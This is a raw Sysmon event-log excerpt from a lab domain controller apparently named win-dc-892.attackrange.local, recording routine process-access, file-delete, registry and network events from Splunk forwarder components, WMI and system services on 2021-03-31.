12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.043{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:08.104{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FC23C20472B7F9B0E7233757D75441,SHA256=C3B277F9057F1BF5E70B213F4297551C330CDC42C811112CBD8D40F4942DA1D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.995{266CAFBE-6573-6064-4801-00000000AE01}60245616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.134{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=107BA00D74DCBA946E2D902E8541BCDB,SHA256=631582EF3712B4AD6072E1DD47F7B36E40DAAA3540252D37B1D7309E370C7C23,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000009663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000009662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000009661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000009659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000009657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000009655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:-1711938829,HighDateTime:30871737***Binary mof compiled successfully 13241300x80000000000000009654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000009653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000009652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 354300x80000000000000009651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.431{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53636-false10.0.1.12-8000- 23542300x80000000000000009650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:10.165{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE714006FD128A8ECF7E9CC896F9A94,SHA256=18176A17CEC7AE6640ED8D338080F56CE8EC82E78DA98223DA5F09F97332072C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:11.195{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F8A1F64A543149418AA1B33531D7C90,SHA256=A7BA178195A3FD655A672969803D0DE4A9CDF19A5EEC204DEC1687C894B371A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:12.226{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F653C551C36DCD79C94C9BBA998EB0E,SHA256=CD972B9815C06F30BE470D5A51C701722AC08C3DF22086184FA05AE1741ED68D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:13.240{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45796493CD3582B3FF55696796F56247,SHA256=DF981E46217D9B1B89865D1449E3E70D6249F1296A4A95C28CDDC095119C09DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.255{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FFD3F8DBCB80F68473964475C4F7CE9,SHA256=8E12F95C4C7F3E383E93198C79C884BEB4EAD649B73700C51FFCD15BECEF7F7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.588{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53638-false10.0.1.12-8000- 354300x80000000000000009673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.494{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53637-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000009672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.494{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53637-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.270{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDFCDCE1A1750F6145BA305234E0FB10,SHA256=86FD97E5C901C6518D69E2ED96FDADBCBF5DC7A85E102B159A8A96C6DB33A92B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29BDB57A9B7A54AE4C07D04A54FB1B35,SHA256=F00088AD44F748056E30132EE906936A4F0DC0E88978BCF3A913A3D5C78037BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B4659CB694CF1A97B68FF2BCD7190ED,SHA256=86EAED2E96E7393CCE279FC5AB4460947963C219A6B2674C7917A7D02C2AC733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:16.285{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C2E0FD01FF4F7F27E377D7B32698AA,SHA256=55613697469BE4B3A933E744D4B4C8546E35B5D097412142124312831558E984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:17.300{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2783E7929321355F5401A68FB7F2B7A,SHA256=B0F8EABEA7184D82AFED0F408C2F887E34A965B1EEBFF9296313BBD6596181C8,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:17.019{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x1d237183) 23542300x80000000000000009678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:18.346{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ED4AB46919972253208122FCFCEBDEB,SHA256=D4691041D040E7941BAD320F36501B3268EEF632488B9C2F8CBE9555776AF195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:19.346{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A639749FFDA50E37ACE69C25C1A46BAB,SHA256=29C52859594A80946BC30ED5F19FBF55E641E3B4DF72D221146FB498349A691A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:20.392{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 